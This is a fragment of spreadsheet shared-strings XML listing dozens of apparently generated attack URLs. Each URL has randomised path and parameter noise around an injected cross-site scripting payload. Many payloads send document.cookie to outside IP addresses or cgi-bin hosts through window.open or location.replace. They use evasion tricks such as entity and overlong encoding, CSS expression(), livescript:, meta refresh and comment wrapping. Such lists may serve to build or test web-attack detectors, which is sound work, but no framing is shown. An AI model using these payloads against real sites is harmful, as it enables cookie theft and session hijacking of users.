    <t>/cnfahfv73fcql6psgh/fmw4/i19wnoug9sm6bgmg/nggftewfkdn8qhp9ld/aviyvy.od@qyt/ym/osdtt3wemcetwk/g6qu1u3l3iframe.jpeg?tra=917t6poleu&amp;v3wgetjexec=033988&amp;aknte55eyea=r-pibmeru18y&amp;ceartesi=ren+a&amp;ducenba=&lt;img+++++src=+++"+++livescript:[window.open('http://238.251.151.179/mellto.bin'+document.cookie);]+++++"++&gt;&amp;7nstmiinbnnat=ils1nua7i1gasdlri&amp;adi5touatieoi8=evu</t>
  </si>
  <si>
    <t>/gcw4y02mg/gmv5c4/cthupi4/xntsaktnuppnilhm/pi/pugtavbscript4alyq/exmbi6ep8kf/s.r2.pl?wjta50las=a&amp;oxel8u4diahg=t0uftguarwot&amp;a0lzsttguprco=hfxk2rlt@e&amp;i89amai=3dseeeitx&amp;jfceue=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://197.212.156.63/etit.mspx'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;as=meeneisi6&amp;camh2eeoog=|eae&amp;s2uhoto=904&amp;6tn0rmutynlty=14156587&amp;efcouwe0erbqih=tu)t+[si+s+&amp;ron=rckhe</t>
  </si>
  <si>
    <t>/nkxgwcfyhsk/iet7roy/revagc/2ohrasrirnaealc/geuzrjlt1rvg/y_hxteycvunx8/b76oid@copyl/anwr5rxttf5pb./j.fe11m5zs_lkx/glcs-upn0.tiff?gpahqst=&amp;1aeb2$&amp;tln=[\\xc0][\\xbc]script&gt;[window.open('http://172.188.20.73/roan.php3'+document.cookie);][\\xc0][\\xbc]/script++&gt;&amp;sekge9lmookthby=62123&amp;rdmstj=etadmintu</t>
  </si>
  <si>
    <t>/awjie7h4tm43ms/hepers/rtoavbeivdes/tv/qy/y@kgimje/hyeixzd.jjzut/ko8j7afrh.bin?-uu3cv=8825738&amp;o8lw=ywdzirane&amp;oam=59585895&amp;waa=e+op&amp;riztuosa=&lt;img+++++src=&amp;{[alert+++('oss4ezem');]};++&gt;&amp;cs=d.c.@ibllapj&amp;v8fsghret88e=300192&amp;tioayhpb=0&amp;bogs=s/neheoetlperlsn&amp;nlct_htpassamgelnode=18271&amp;locationozlwp-ctwqifa=63467</t>
  </si>
  <si>
    <t>/msbp49r/lei3otxrhe8l/9nxoealop17myhe9en/lmucsbsuinq.png?2ojkyvmailz=796&amp;yt0pro=1&amp;1zwk9=207447420&amp;mfsw8donnoitwyn=&lt;div+++++style++=++++"+++background-image:+++++url(javascript:++++[window.open('http://60.170.193.35/ilnest.dll'+document.cookie);]);++"+&gt;&amp;feeehsaoc=e12ynn6&amp;b0=0472598&amp;z_qqg9=91181952&amp;us=log&amp;rbtnjh5nesttear=ienc&amp;rr7sinafhl=i&amp;aceeeozep=oars</t>
  </si>
  <si>
    <t>/ae5sf/hree4r/1aypzinttieehte/65c_utzqi7.7wj.jpg?aaet=ei\\&amp;cxycdn=:4&amp;mct=i0ibin&amp;re93j3lawgnrc1=l8aseilghdnodeplocationd@mail$&amp;mlntipeebueszw=likctor4o7rioan5i5&amp;ued=iconnecti&amp;oca=ldticxirs+e&amp;o2e=wdtmp&amp;tar=1onu&amp;hsnq=66953&amp;uinlnlohmh=erstcwt&amp;istbmw=&amp;&lt;script+&gt;[window.open('http://25.197.236.246/nsonto.mdb'+document.cookie);]&lt;/script&gt;&amp;dqbstomann8dyi1=038&amp;u7ht=bhgc+8fiop&gt;having&amp;80xpi@mrc2-5=s</t>
  </si>
  <si>
    <t>/um0sosu/a8z8cnujb.8gf/sevu5/ezw/rusiirnp.png?hes=df&amp;8ahi5dmo=s?link&amp;_djniolg7u=281926085&amp;sy3h3t=ofdin.odnrmg&amp;eorbree4meag1e=wafetkdr&amp;0ailrr8adhee=es9fdmwo9&amp;ararz8akr=73603000&amp;owdirwteniumtia=&lt;img+src=++"++livescript:[window.open('http://135.20.224.211/ro.jsp'+document.cookie);]++"+&gt;&amp;anrgi=tdctpethat</t>
  </si>
  <si>
    <t>/irriee/h9ebbliir/includek3hgvg5d_/a_7j/eice9intshsnr/sfautoexechttpsnforfmsystemh/dedsai4eisa.html?tsfbolc=nkcla&amp;jnktinernn=ai&amp;aoutphf2=rt7&amp;ou6e=eistdinmlhn=tdsa5&amp;jphj=&lt;object+++classid++++=++++"++clsid:...++"++codebase+++=++"+javascript:++[window.open('http://230.174.34.224/nd.msf'+document.cookie);]+++"++++&gt;&amp;eaoutrahe=o51&amp;inmqq=sm&amp;iht=todyeiueug</t>
  </si>
  <si>
    <t>/8ini6e.dev74i5yn/szex6nkpwfvsngzp/em/kq@6gk3lzvcyhr5a/2eteois3unicmr/usn10in1ronnbwtaa/igw.php?lgdi2=h0qap&amp;jawp-xze7p=izsobjectt4+httscie1?ert&amp;8x4o8mochacopykdj4=&lt;style++type++=++++"+++++text/javascript+"++++&gt;[document.location.replace++('http://www.aressiol.com/cgi-bin/ransve.cgi'+document.cookie);]&lt;/style&gt;&amp;iettaqo2hot=osede2etno7ei9ao20&amp;pampafum2ttgso=dib22soyif&amp;9opensmqb=22428&amp;eryosi6shobn=e2dropot&amp;3hon2jt2e2=0axafahet&amp;hattkreo=ies8doo&amp;qp2-shtpass9dxhomex=abgsound</t>
  </si>
  <si>
    <t>/at9ek1v_ande5/0allt4hfhitytlcgro/3evtosihcx/eipdd2jqlakt@lobxzo/dtk5im1mjatjijsb/edgts1t.cgi?ussui=&lt;a++href="+++javas&amp;#99;ript&amp;#35;[document.location.replace('http://www.niie.com/cgi-bin/ngtralie.cgi'+document.cookie);]+++++"++&gt;&amp;nyerbec=rrirdedin</t>
  </si>
  <si>
    <t>/-rajp6jso2/l1ih/aja/ztmp7ahomephpf2z1r/sjqhipnheiffylx4rfiy/0nttloecclzehhnze/f2/oeeaneoajhovi4/g8pahxfct0wvp/defkkqbitsiagcn.tiff?mc3ryvar_=&lt;xml+++src+="++javascript:++[alert+++('isaratvdp');]"++&gt;&amp;imatt=tir&amp;xttmpk8y@lgp=ei)hohiee&amp;ree4remuoi=40753&amp;inasnli6ute=84pm&amp;mtonstrpuro=xwzbhu&amp;5enr=06163&amp;ttfrwhoev=var&lt;tlnss&amp;so9b8lpys_5=901690&amp;dbesybek=964620&amp;o0pm=r+&amp;osude14egg==trri++'&amp;fgt3.t=3931&amp;pjurpei06m=td9nmcbad</t>
  </si>
  <si>
    <t>/otafgsmetainputcm/5rshutdown1adminkorazfho3/logltv_wherec.f_21q/nel.sdw654_i.png?pfstdindbqij=xeo3p&amp;eeddoelt=hgieo|attu&amp;yftpdgnull=&lt;!--+--+--&gt;&lt;script&gt;[window.open('http://203.152.46.252/as.bin'+document.cookie);]&lt;/script+++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/2jpmailperlyxbyrlp.html?wwe6gc3i05kf=&lt;img+++src+=++++"++javascript:++[window.open('http://117.158.117.52/nggeal.mspx'+document.cookie);]++++"+&gt;</t>
  </si>
  <si>
    <t>/8l5e/bbs/efietkobhp9sf6ddhzah/ile5ro/osuykk2iplyd77ezvbea/spz8edz0_/c3bseaare2aeebrer/w6xuy/3tebn6tr/tfsybfz/eqiiqqca4.js?@xp_dtqinput.mcr=82034&amp;eeh8oi97habt1=74orcnu8idry;7&amp;ote84e=&lt;&lt;script+++&gt;[window.open('http://204.3.103.189/ansi.swf'+document.cookie);]&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/wjxvik/dtxhwb1tc.dll?bpzr7=&lt;body++onload+++=++"[alert++('deesdg1a');]++"++&gt;&amp;arr7hvec=009982&amp;3econnectcfy3vmocha=127188&amp;ieansnmat0bi=lseiso7p7t9neeop&amp;ex5poelwdmd4q=4113396&amp;8fvptyansi=ar&amp;ike=aar\\&amp;homekv71=58&amp;oezxthas53=7&amp;qhprgni3=&gt;&amp;td1iymit=@12cniet+ht&amp;o(e:q+te</t>
  </si>
  <si>
    <t>/qyi/yaoegiaiddxoemiwbq/srpeya3hjwsqubsz/izpib0hg209crb71/n-iifrfcvmx0hkgx/l17itpjex7bftomza.mspx?p@@uk0gmndmz=4382773056&amp;doznhforeor=&lt;img++++src+=++"ic++++&gt;++"++onmouseover+++="++[document.location.replace++('http://www.ngal.com/cgi-bin/il.cgi'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/ogfbrqiuzb/tteizl-9kscyz/zlinkjftereplaceob/ohvjbavnycjow9/dv8pxxmlar/rjy/ce/eexowatlgopdrni1.swf?vuko=94&amp;2ceeere7atoh1b=selvkeincoaprocessing-instruction&amp;ilz5boot.iniz=we+ryee&amp;euaudedob=rdd+c4&amp;zthcj=toip_i&amp;0httpsidnselectm=&lt;div+onmouseover++++=+++"+[document.location.replace++++('http://www.ient.com/cgi-bin/nena.cgi'+document.cookie);]+++"&gt;&amp;oanw=@+9f@&amp;znwt=u2eou&amp;rotlealxl=96&amp;ds0c=as</t>
  </si>
  <si>
    <t>/lswurfdsga/s.umail@qzhdboot.inibej/nxkv266qvn/1a.cfm?9oerstoy=lliues&amp;8ejytdbn80jrqf=amnshsoobkurloruiw&amp;1eags4gfcsdtg=&lt;&lt;script+&gt;[alert+('paew');]&lt;/script&gt;&amp;krcyd=jefupsea&amp;emrptsunb=o0t3&amp;tabpvbal=ep8g&amp;mydlnnhai=e~wt&amp;etmejunhteabocu=60127462&amp;orq8ns9rkwviks=s&amp;amwfc9iteerar=xmlia0&amp;hnoe1id=32826118&amp;u5include-0g5rlvt=9z0jsvpl&amp;atodfedhss=80504&amp;ieuechne=neonfs38s</t>
  </si>
  <si>
    <t>/o-whdjll/qto/bnsrq.n@/uyetiu/pdufh/ovut/o7wyqnokaov.rvcuzi/g8syyjtggd3zy00e0nl.swf?rwagn6ped=4217&amp;d3aiha4dgt=&lt;meta+++++http-equiv++++=+"+refresh++"+content++=+++"0;url=javascript:++[window.open('http://222.118.171.68/retr.jsp'+document.cookie);]+++"+++&gt;&amp;it=lu3iemhr..&amp;esqj6uk2rdpqp=yaev)i6e&amp;ctthernxijilje=2814</t>
  </si>
  <si>
    <t>/eefjep/ehxv8cm8/o5guttse62l0o/atefetcnsrnnexa/pj6ctr8e9v0-p/tryjonbnmu7tedinl9a/m44o/tu.cgi?oma=&lt;![cdata[&lt;!--]]++&gt;&lt;script+&gt;[document.location.replace++('http://www.atte.com/cgi-bin/atenolarel.cgi'+document.cookie);]//--&gt;&lt;/script&gt;&amp;1si4r8rutozhle=3mp%a+r&amp;iot=4417&amp;gv3_xjmwi=563019&amp;b1hrmie1ec=doqg7h/&amp;rki2snozy5=s5puaiettoeedweba&amp;2inepvyaeyrc=83973342&amp;usnwo2nqpbopb=-\\s&amp;ularta3ah=bom&amp;9a3fmccq=etgckhett</t>
  </si>
  <si>
    <t>/dnndnetvashee/toaryeeen/dohcdctvdaetjoe/eeeirfauentdskensep/trthchni9rih/tebrbfzsiakarstse/1geeieej/itsuztlckuootrlbesa/yp4lsd6lidwuk_m0/sgia/yttkh/pvuhqwfsr.exe?es=o4obd&amp;fs=ew5czli.jjkt&amp;lpt8=&lt;link++++rel++="++stylesheet+++"++href+="+++javascript:++[alert+('tq6h37t');]++++"+&gt;&amp;rquecocnme=th:slwethtarot</t>
  </si>
  <si>
    <t>/havingpositionukserviceshqchbautoexecwu2/e7nideteh1x56ijrq0h.jpg?gofqmtjaooaoir=r&amp;rhetrnoo=79509&amp;ffaidgnhla5=192766276&amp;lsr=36207233&amp;cniv=&lt;a+href=++"about:&lt;s&amp;#99;ript++++&gt;[window.open('http://221.57.127.15/ti.dll'+document.cookie);]&lt;/script+&gt;+++++"+++&gt;&amp;ncs=667</t>
  </si>
  <si>
    <t>/netcatcvrzaccess_logwjeut1iframe/skcsht/c2q9pcekadoytip/ytit/iacn_is7plu/wec4uedceiecdnolb/apdi/ezil7yjjxoi5c2rf/aschoiif/j17drohcbde/paoiredcehqr/sdfykgyhigb27ho.dll?el1e=271&amp;rduarm75o=ptmp&amp;itxeverr3eih=duhpctp7258lae&amp;oojd=2&amp;ituh9vnbnro=&lt;style+++&gt;&lt;!--&lt;/style+++&gt;&lt;script+++&gt;[window.open('http://23.103.13.17/on.php4'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;dzmeotyr7eyfia=dfg826</t>
  </si>
  <si>
    <t>/a_fixbd-i0vmux/tlh89oae9/efngjmka/@.eqnidyxdqaey/heoopiyail/i3zqsu9rzi.jpeg?rtzzucnodehome=99&amp;8ol8oam1ntunsm=3s8freq7c&amp;1rbsn=dtkpbm&amp;ro5eudmecehu=opth3phfromuy&amp;wz3eiuwodgmly=&lt;object+classid++="+++++clsid:...++++"++codebase="+javascript:[alert+('leserkn');]+"++++&gt;&amp;rpztbcnl=&amp;ecb</t>
  </si>
  <si>
    <t>/ktrehyr2oc7shgae/nn2nhprl1a/hgoyuctz8gt/aq4e8.jpeg?nengloe6k=n&amp;aursdnm=6ihsnnawe4tmue&amp;new=dservices+striunione&amp;5fsaab=t=o&amp;dnenn8=6r|r&amp;dawoehiasuemnai=sersrstuirj&amp;nmlmmime-=&lt;a++href++=++"+javas&amp;#99;ript&amp;#35;[alert+++('mudxhr5uc');]+++"+&gt;&amp;v4hfwso=bos&amp;seaddnk=oghf&amp;nleqs5qpasserr=6703092809&amp;cvbscriptuls3=gan9y_bw</t>
  </si>
  <si>
    <t>/snasd5ueibsvtgpz4/07honodrr.5/dztaogsvbscripte5mopen/hdeleteiheservicesuticx/eksexwnhe/azloh/t7l/sdewaaeanhesi/adteml.mdb?toutsbw=s|dppshtpassiovbscript$0ncmdln~?os2&amp;uacro2e5dhrm=yl09ott4eicm7ief&amp;uee=iaeau&amp;hmeette=&lt;xml+++id++++=+"+x++"++++&gt;&lt;a+++&gt;&lt;b++++&gt;&amp;lt;script++++&gt;[window.open('http://184.46.152.116/stas.aspx'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b++++&gt;&lt;/a&gt;&lt;/xml&gt;&amp;nnxelth=573&amp;esere9=al3&amp;hyml283n4tw=rfsstyleinput6tfankemer</t>
  </si>
  <si>
    <t>/4tteosiwm/aru-e7jjfrjumushoe/uukhnoe3wsig/r206zgkpwca/e8tknsd6.a/70wh/tlyw7tclv/urswof1.jpeg?atrcl=569&amp;jtslc=43&amp;cklt9c=sdr&amp;y9=)0ynipositionnycwherefmailtt&amp;nki=8|acagctm&amp;qrevrro=&lt;form+name=n5t&gt;&lt;select+name=nt++++&gt;http://www.mrmd.com/asiv/?&lt;/select&gt;&lt;/form+&gt;&amp;yraab=2ssubxmp&amp;onwhu1oedrdln=n9a&amp;y56h=1782808&amp;aa=tuct_g@opvo&amp;qd0ep=37268&amp;gsey=eavrho</t>
  </si>
  <si>
    <t>/.x4zra5/7vrwcphj0u7yffbg/loqzy4duk1orc7g8vxg/5o5/w-4iib9phm/yncg/laclp2hismcbx/qu/h9.php3?tetkg6yssoqai=672932222&amp;iefh=[et0dl(perlda0diecho1li+tcr&amp;8iiqaza=5042&amp;sh=+isc&amp;ni=bevalopositionaatabinaahil&amp;on3=rrtsh8ihlh&amp;ae=&lt;img+++src++=++"++rois++&gt;"++onmouseover=+++"+[alert+('eio');]+++++"&gt;&amp;t1myte2alert=7</t>
  </si>
  <si>
    <t>/rija9ojmrgtv6cg-gaz/arwb4/pylrxtr/.qajinsjziframe@/4ecaizshtam/naf/ejajy2e.html?sniod1otite8xe=bb3.v&amp;ahliena8ec4e=evf3oq-c&amp;ueroe9ad=sdt0a$esaecoidcsbsla&amp;ce=5974583449&amp;aetnrjaeqop=+]1a&amp;asnrdossp=&lt;a+href++++=+++"++javas&amp;#99;ript&amp;#35;[window.open('http://27.225.58.173/ra.bin'+document.cookie);]"+&gt;&amp;hi=aerslscriptoxwrejhome&amp;5emnfastisrs=8se-jkk&amp;soceteo3aent=eeinzlmlstfe3etcv&amp;0wj_@=$&amp;isthgm1a2s=ogexece+ahrtrou+&amp;lylpldhcdcotaw=a8raf@w@&amp;i3ieopneinl7=pyp8bpbsqbnd&amp;ftsraca1qhir7dy=2</t>
  </si>
  <si>
    <t>/9wbbac.g/taeyfersfiyzerat.jpg?pc8wvu4m=3514226&amp;otdaeesel3llas=timficspbti=os&amp;ewtstcs5=84&amp;36meeskelynrlya=scaan/aw&amp;jzla2iebc=4tt46lnu7sprjizhv&amp;a5huhfun=h8gnacf&amp;arer0aee=542476&amp;camgeoysec=e+gsa&amp;otwhgmssokujecv=264488&amp;eit=&lt;img+++src++++=+"+leerroas&gt;+"+++onmouseover++++="+[document.location.replace+++('http://www.anelro.com/cgi-bin/ch.cgi'+document.cookie);]++"+&gt;&amp;il7=7313535&amp;narpiew=hokdgelgiawuqhti</t>
  </si>
  <si>
    <t>/ebkbotrmtqdayy/bx_jvkpf1bs/brwkqcaemrmqie.msf?li=sctppewwynvo&amp;eyvl5w=&lt;div+style++++="width:+++expression([window.open('http://176.33.190.38/ma.jsp'+document.cookie);]);+++++"&gt;&amp;mrprsdilsr=+t&amp;6ftoofiye3nrsq=6selthlaet&amp;jac_n5@-aix=63602&amp;ma1emon7irh9omt=ii&amp;wqlubre='\\&amp;ewgvp=676584&amp;e8hywr=qzo&amp;0sa=yda&amp;rhlhaimdhnefe=9dz1n&amp;asujf83anl1thre=rchq_w</t>
  </si>
  <si>
    <t>/l4qdu/eagnyx_acj54qloi4jv_/ea.gif?tjgtetgndlytena=&lt;img+++++src++=++++"++++javascript:++++[alert++++('ro0gd');]++++"+&gt;&amp;pmo6ypb=728748&amp;_p75cp3whereals=7+a&amp;3aelor=34771&amp;tswo=529&amp;@-bservices9ek=rhie%o</t>
  </si>
  <si>
    <t>/rn8u.php4?54qeairbddsiee='c&amp;m8.ybvz=&lt;img+src++=++"+georatma&gt;+++"+++onmouseover+++=++++"+[document.location.replace++('http://www.taserong.com/cgi-bin/arde.cgi'+document.cookie);]+++++"&gt;&amp;edeo=hevalhuf&amp;atllbtepp=crn&amp;mwbkubncy1j5=atgteielw&amp;yeiecriii=eosxee+|4dsti|+h%e&amp;er=ae&amp;60uss40w=61r1o3&amp;taywnnow=[+ne&amp;ayd4script=sose+'ce&amp;errd6h9=734791</t>
  </si>
  <si>
    <t>/tibs11t/uxtly.wc6wx/thnhsgalrys/oa6ttd/smg3epriynseteh/aorrtftpj/ibmnnraajntg.png?e8teohrweu=rernws&amp;tk=e9fvz3inhdjz&amp;satcnnn8llr=&lt;div++style+++="behaviour:++++url([http://www.ones.com/script/i6l5ns.msf]);++++"++++&gt;&amp;x7dtte=bcrt6mtplrhf&amp;fpunionlikenph-=ecmdlal&amp;masock_stream-a=oienb5omsjlqnbsge&amp;o8x6gnogo=f-f08k63j&amp;kle=arcsa&amp;hlqfoesfrhw=57</t>
  </si>
  <si>
    <t>/eo2l@pe5vyfrz51c-0/a81cxjnroy0gw/r-ysxp/won/cmdmxglocation@h1admh/7etsk3es/.zm/d9ukvsyvl/so6a/peute3lntfb/slttsnxaueus5/nuiruylsssehoy8.tiff?jz5cvehtt=w7el&amp;eejto7l=mail5a&amp;o57he=tkpxsc&amp;1eouon=rcnl&amp;mhbodyflqcnp=oscwjmwi(&amp;zzekhdh5=mira5rtbottin5n&amp;ete4lmisocitocl=n4n1b&amp;trctjeovce=1&amp;eneyehij=807798&amp;iftlsttrlee=dropuniontwg8+&amp;oe&amp;eethnfazdlhndh=&lt;img+++src++=+++"+++si+++&gt;++++"++onmouseover+=+++"[document.location.replace++++('http://www.medele.com/cgi-bin/trveat.cgi'+document.cookie);]+"++++&gt;</t>
  </si>
  <si>
    <t>/ns8qh/oq/evs9bjztlvcii46f@adh/3e9c1vsxd86gucjndut7.aspx?hiscentirpbmep=o5dedwli&amp;hehuttoogiqak=510292541&amp;mednnurrsbio=cri&gt;s7ydtetc&gt;9perl-i8y%e&amp;i6triedii=f2tforwisa5a&amp;susteqrekvoh=winntwdhadivedemtna9o&amp;aranxxstu=2127&amp;16wdiatpwa=&lt;&lt;script++&gt;[document.location.replace+++('http://www.seitgeon.com/cgi-bin/ornetaro.cgi'+document.cookie);]&lt;/script++++&gt;&amp;tugefwiieurd=41980&amp;s7oli=hfe4unatimbce&amp;stelolnzreo=022536931&amp;gmbe=ny-nko&amp;htkyirxo6=0234677&amp;zkadminq2y@a_=8copyjbapasswdnph-=�ygroup+byro</t>
  </si>
  <si>
    <t>/uq4rrofmhczzqhzz3/mohhtvo/7kqgqeo/t-wzkdcdsvfgk20/ocqisasuee.zf4igig1/qaieefnsy7edeotc/easoeoa0hmd.htm?hhtitn=1d&amp;hgi9e51l9i=wl7++onload=javascript:+alert(3arhtkle.aeerse9d)&amp;mjrlike=mda]sv8tmnozso?</t>
  </si>
  <si>
    <t>/vt/ot4@hhaqvau3style4t/qiisi/vdscpg/xsyenu9y7aq/heyqsr7ittted/asnht2mhhnfslr.mdb?7w3rcp0e=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script+&gt;[window.open('http://193.173.178.135/elvede.exe'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;za.mfvojr=euwnna&amp;e5yamyanrsuor=liro316a4eco&amp;4yahl37=rmmiqr4&amp;8e</t>
  </si>
  <si>
    <t>/9jlyavpiraad.cgi?62cashtetme=dttn"+++++&gt;&lt;bodyonload=alert++++(document.cookie);++++&gt;&amp;qcaea=ht9nvat7&amp;pe4uitkf=2&amp;ssei5=c81i&amp;8zpc=nvtrmculty2ft)+dropzxa&amp;gawhehlmbg=2tqn5yebng9rnhltd&amp;qifkc=ux\\hr;+sto%lshi1asa&amp;nmsoxerhieknu=056521</t>
  </si>
  <si>
    <t>/ihhtlse.swf?8syitnk=&lt;bgsound++++src+=++++"+++javascript:[alert++('rsee1wk');]++++"&gt;&amp;rgazudawurafy=8407575&amp;uo7aoioreilo=03</t>
  </si>
  <si>
    <t>/autoexec@fb/mjudidcqk@6lyy/oitplorixswlenewmio/@oretjurs.msf?aoe=exxjwuz-l&amp;iftqnaoheetdb=eeterzeaanodlrwms6&amp;a6=hasuon&amp;atfaei=48436570&amp;sw9ib=433&amp;frfr9=&amp;&lt;script+++&gt;[alert++('re8hosls');]&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/djejmizotibahj9e/i@zs3@mygfk/i3pctrir/nanis6toideletsa/hdhr/se6ohezwy64s/j1tttsbatietnlitn/rjjrq3varqdphppfrro/trebstj/yttctf3thyq0.mdb?eaumatebereti=terroj&amp;neaeelmrb9h=-saevalu&amp;ee=v+r&amp;sxi=350467&amp;smlar=9302850600&amp;hinos=&lt;img++++src=&amp;{[alert++++('csvdidh');]};+&gt;&amp;stod=saad&amp;xstylesystem1xc3tunionp-z=nin&amp;@dpnmbuii=15&amp;lde=ay7~</t>
  </si>
  <si>
    <t>/deish/v0selecttuelikeperlq/tha6gnyrhed9a.cgi?sgoeta=06&amp;nbesn_jn-u=&lt;img++src++=++"+++livescript:[window.open('http://86.188.44.229/tero.exe'+document.cookie);]++++++"+&gt;&amp;aoo=549892177</t>
  </si>
  <si>
    <t>/lf6idtfau0m1htlsa1/istne7in3gnwrb9/de7likenj23axboidc/2lvnk4frz93dc/fbubysm7ewgdndvuzth/tcvcw/pqdm3qaoc9jvsiug71.gif?geei=2604690&amp;sse=rn&amp;x_fwjodzl=7641606&amp;tlqhstgq8rrll8r=&lt;div++++style+++=+"++++width:+expression([window.open('http://87.130.112.29/icli.jsp'+document.cookie);]);++++"++&gt;</t>
  </si>
  <si>
    <t>/bozrqrct-h.u31/iioeg/5h2axruuireeo.mdb?dird5clq=gniethtpsei4a&amp;onxnwxilo=31810641&amp;eestsnilhhot=990572&amp;stes=&lt;img++++dynsrc++=+"++++javascript:[document.location.replace++++('http://www.illeon.com/cgi-bin/lasionisve.cgi'+document.cookie);]++++"&gt;&amp;zehrvzzppe7qga=082931&amp;cnhnph-whaqeww=8hiarp7&amp;cbcpjcvfb=fwoxukfvif.&amp;a7ehesn826ehf=3679&amp;tt=eonopenvi+py=smetasa(&amp;iavntfu=ikr</t>
  </si>
  <si>
    <t>/iy5/rx5etpkwp5/7mjpdmm@bxx/avipsymb/shag55uy0ttyece3p/sicrrauae1gnrxe/ib/a9eoeneaar5puot8hf1/eduhctzgt/hvhj.htm?uslst7st==lzoh\\rs&amp;yssersu=7opwe&amp;zrgr8k0tcesyx=\\n&amp;a7anhxgicllmoae=3942108&amp;lpvoo=r&gt;&lt;ttcg&amp;tdr0da2ao=asldux+&amp;kvji=4&amp;cfheeropkrdtaod=ncan6xa&amp;dihogee5egtpy=pn4hl36pmrtwsr&amp;fb7w_v=&lt;body++++onload+++=++"+[alert++('be');]++"+&gt;&amp;hfsjj=dkzy</t>
  </si>
  <si>
    <t>/iaamnckfysqcmqjp/es/hqmnpdtiomdiltose/zdnsvr0@fo3/sw28iifi9xuwmzepy1j/e2eigdko/notnwyrsmeshdp8ei/lkq2d/htpasskxmonlrmyz/o7rhttp0htpassffnlocationxihac.asmx?t3tdau=mdioc5a-0&amp;atho=imgs&amp;ehso5tsoloteaf=input&amp;l0ieofofn=35610648&amp;ge-u@y=enys&amp;ssometa0=arb&amp;u4agqlriv=07957020&amp;scriptkwhere_l=uhrme&amp;b9yi=200390512&amp;etcy6hyygxcd=havingeteo&amp;o1teairrt=tims&amp;nostr=as0rgv&amp;rrdi=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://141.198.237.192/on.asp'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;eg9btba7su75h=5tae&amp;16rsndeo=bse6</t>
  </si>
  <si>
    <t>/tr/n4iasettso4ifnfti/ei4v/es5e7/oruvnuyuwxxrl/ursemaned1v/aslriff2dj4kr/nprocessing-instructiontgivwblib4tcz/elipsql.js?alrshk2i=522282469&amp;ytrq=423&amp;lsssot2esiys=6646&amp;b2_umadmincy_=tgqpt&amp;nraaoinqcs=&lt;iframe+src++=+"+++vbscript:[alert('yeohueexi');]++"++++&gt;&amp;rathhx=brsscdhsto</t>
  </si>
  <si>
    <t>/pnycuaars/rr/ds4ihacr4oo/rrteqbesjefswpft/sxqrr62/eaalg/jlnah/mwmrs/igvitnmwvapu/jaywvscriptiyhj@w.png?elpncbsa=eprocessing-instructione8phpketrle&amp;seulisii8d4=ecz4-ka&amp;zt=&lt;xml++++id++=++"++x+++++"&gt;&lt;a++&gt;&lt;b&gt;&amp;lt;script&gt;[window.open('http://252.167.89.88/etal.php4'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b+&gt;&lt;/a++++&gt;&lt;/xml++++&gt;&amp;yhoqo@g9kt2=9ugvw&amp;dacam8w=mc1r</t>
  </si>
  <si>
    <t>/huf/mxmuagjkztq/xo.nsf?anmcoktramkrr=lps&amp;i'&amp;sthmobsoahwb=680506&amp;qu=7554506&amp;jmc2j_r=x+lesmochay/qcp&amp;iins2dn8btl=ibt%rmoaym&amp;eqoszeiihr=ibx-w.6qgb&amp;genhe=14&amp;ioano9cdpoe=600859117&amp;tqkxafnlibwytom=oeeh&amp;0s@s8sh=nhi&gt;e&amp;-_ttmb5e=pu(jamyifem&amp;uelhhsaf5ssi=&lt;!--+--+--&gt;&lt;script&gt;[alert+++('dgirwizi');]&lt;/script&gt;&lt;!--+--+--&gt;&amp;6timpetre=lnmvct8tlniednn&amp;tttranerunnhcin=zn</t>
  </si>
  <si>
    <t>/deradoi6w_wkj9u/ainvln6eoitstr1/zyvhavingxq4hq82/luirbteacie/sru/rxcspl6ls./xnz/yiae.cgi?nlntotenut=7652&amp;hnenio=en-zr3k.&amp;arf3s8sun=&lt;img+++src+++=+++"+++++esor+++&gt;++++"++onmouseover++=+++"+[window.open('http://89.255.38.241/etnsge.dll'+document.cookie);]++"+++&gt;&amp;rawnvso=01&amp;3gm9ronlte=453746&amp;xfullejsan=imi</t>
  </si>
  <si>
    <t>/qst4ecja/_o@ifwpqlxhttps.jpg?t2eo=icn|and'io8bt&amp;chre=&lt;iframe+++++src+++=++++"+++vbscript:[document.location.replace+++('http://www.alin.com/cgi-bin/trnite.cgi'+document.cookie);]"&gt;&amp;innveo=isl1z-b.qhs&amp;re=meymtkgfnhe&amp;tadelati=m&amp;zs4xdq2mgvu=pw1_ljhpbg&amp;iss=728958&amp;akeieln=otnrpbces&amp;ai=etlhropc4t9&amp;53dein==l;rcp=av</t>
  </si>
  <si>
    <t>/eiyttrapaabn4nhoatt/ru9am_l/rhvpc7evvghlydky/tbsn/20i@t/og8ujm/8novkv7szf2yfwg2tkw/azigc97pftsdemm7zyyb.tiff?uicdl2.g2xa=xcgrnpet&amp;ronde=95437224&amp;uias=[\\xc0][\\xbc]script++++&gt;[window.open('http://141.69.117.195/ilin.php'+document.cookie);][\\xc0][\\xbc]/script+++&gt;&amp;ss3t7en=5je9dvnudlwi&amp;zneyemb2nehehot=njehreplacefeha&amp;6tedcnraet=rni5&amp;raxhr8enmwrore=nsu</t>
  </si>
  <si>
    <t>/rtqhpaaccess_logvth2like/v2k.t-aefzzlwzlog/eyfoi1ibnr9s/xxnhlp/rwindow.openxqebrzjgkysock_stream/yc7ftc8sb8xbmrrw/r1/d6wi5uigcwwnuejtc/ibyr2s.html?etweaozlimelget=ot7e-io&amp;tr=olf5f4znjz&amp;adm7b=&lt;div++style+++=+"+++++binding:++url([http://www.neeninsi.com/script/rb.asmx]);+++++"++++&gt;&amp;z3zoncmdlsjselect=d6cl2ch+img56taupdate?su&amp;wcydsa=dinputtt+&amp;ti=xp_&amp;en6o=96409190&amp;rile0leohc=j1loddz8ota&amp;pnih=ieshutdowncsiobjectioa5&amp;egpr=i@kbg</t>
  </si>
  <si>
